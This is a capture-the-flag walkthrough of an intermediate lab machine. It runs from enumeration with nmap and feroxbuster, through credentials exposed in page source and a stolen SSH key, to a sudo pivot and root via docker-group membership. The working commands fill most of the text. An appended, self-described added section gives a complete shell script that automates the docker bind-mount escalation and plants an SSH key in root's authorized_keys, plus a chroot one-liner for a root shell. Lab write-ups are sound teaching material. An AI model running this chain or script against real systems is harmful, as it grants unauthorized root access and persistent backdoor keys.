RATING
Intermediate
ENUMERATION
First, we kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.95

Navigating over to the target in our browser doesn’t show us anything too interesting, so we proceed with a directory bruteforce using feroxbuster:
Command: feroxbuster -u http://192.168.163.95/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200

Navigating over to robots.txt, we see 2 directories:

/nothing literally has nothing, but /hidden_text reveals secret.dic which contains the following hidden directories:

We discover that pwned.vuln is the only valid directory:

When viewing the page source, we discover a username and password:

EXPLOITATION
Using this username and password, we are able to FTP to the target. In a folder named share, we find an id_rsa key and note.txt. We download both of these to our local machine:

Viewing the note.txt, we see mention of user ariana:

Using ariana and the id_rsa key, we are able to SSH into the target as this user:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa ariana@192.168.163.95

PRIVILEGE ESCALATION
Running sudo -l reveals that ariana can execute the script /home/messenger.sh as user selena, without a password:

In the home directory, we see a directory for user selena, but we do not have permission to access it:

We can take advantage of the messenger script to get a shell as user selena:
Command: sudo -u selena /home/messenger.sh

We see that user selena is in the docker group. Membership of that group is equivalent to root on the host: the Docker daemon runs as root, and any member can start a container with the host's root filesystem bind-mounted into it and read or modify it at will. First we list the images available locally:
Command: docker image ls

Either the privesc or the debian image will do. We start a container from it with the host's / bind-mounted at /host inside the container:
Command: docker run -it -v /:/host privesc:latest sh
Inside the container, everything under /host is the host filesystem, so we add our local machine's public SSH key to the host root account's authorized_keys (the files must be written under /host/root, not in the container's own /root, which is discarded with the container). If you don't have a key pair, create one with ssh-keygen. Appending with >> keeps any keys already there, and the chmod calls satisfy sshd's StrictModes permission checks:
Command: mkdir -p /host/root/.ssh && chmod 700 /host/root/.ssh
Command: echo '[insert public key]' >> /host/root/.ssh/authorized_keys
Command: chmod 600 /host/root/.ssh/authorized_keys

Now, provided sshd on the target permits root login with a key, we can simply SSH to the target as root and grab our flag:
Command: ssh root@192.168.163.95
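The docker-group escalation above, collected into one script as an added example (this is not code from the original writeup). It reuses the image name privesc:latest and the /host mount point from the steps above; it assumes, as the writeup does, that sshd on the host accepts root key logins. The checks before the docker run are additions: refusing to proceed when the current user is not actually in the docker group, and refusing to write a key line that OpenSSH would not parse.

```sh
#!/bin/sh
# Added example, not part of the original writeup: turn docker group membership on
# the host into root by bind-mounting the host filesystem into a container and
# appending an SSH public key to the host root account.
# Assumed (not from the page): IMAGE may be overridden; sshd on the host allows
# root key logins.
IMAGE="${IMAGE:-privesc:latest}"

# Return 0 when the group list (formatted as printed by `id -nG`) contains docker.
in_docker_group() {
    for g in $1; do
        [ "$g" = "docker" ] && return 0
    done
    return 1
}

# Accept only key types OpenSSH understands in authorized_keys, so a stray line
# cannot break parsing of keys the real administrator already has in the file.
valid_pubkey() {
    case "$1" in
        ssh-ed25519\ *|ssh-rsa\ *|ecdsa-sha2-nistp256\ *|ecdsa-sha2-nistp384\ *|ecdsa-sha2-nistp521\ *)
            return 0 ;;
        *)
            return 1 ;;
    esac
}

# Build the command that runs inside the container. $1 is the directory where the
# host's / is mounted, $2 the public key line. Every path is under that mount, so the
# key lands on the host rather than in the throwaway container; >> preserves any
# existing keys, and the chmod calls satisfy sshd's StrictModes checks.
key_install_cmd() {
    d="$1/root/.ssh"
    printf 'mkdir -p %s && chmod 700 %s && echo "%s" >> %s/authorized_keys && chmod 600 %s/authorized_keys' \
        "$d" "$d" "$2" "$d" "$d"
}

# Run the escalation: $1 is the public key line to install for root on the host.
escalate() {
    key="$1"
    in_docker_group "$(id -nG)" || { echo "current user is not in the docker group" >&2; return 1; }
    valid_pubkey "$key" || { echo "refusing to write a malformed key line" >&2; return 1; }
    # -v /:/host exposes the entire host filesystem read-write inside the container.
    docker run --rm -v /:/host "$IMAGE" sh -c "$(key_install_cmd /host "$key")"
}

# Only act when asked explicitly, for example:
#   sh docker_root.sh --run "$(cat ~/.ssh/id_ed25519.pub)"
if [ "${1:-}" = "--run" ]; then
    escalate "$2"
fi
```

Once the key is in place, `ssh root@<target>` completes the chain. If sshd turns out to forbid root logins, the same bind mount still gives root without SSH: `docker run -it -v /:/host privesc:latest chroot /host /bin/bash` drops you straight into a root shell on the host filesystem.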
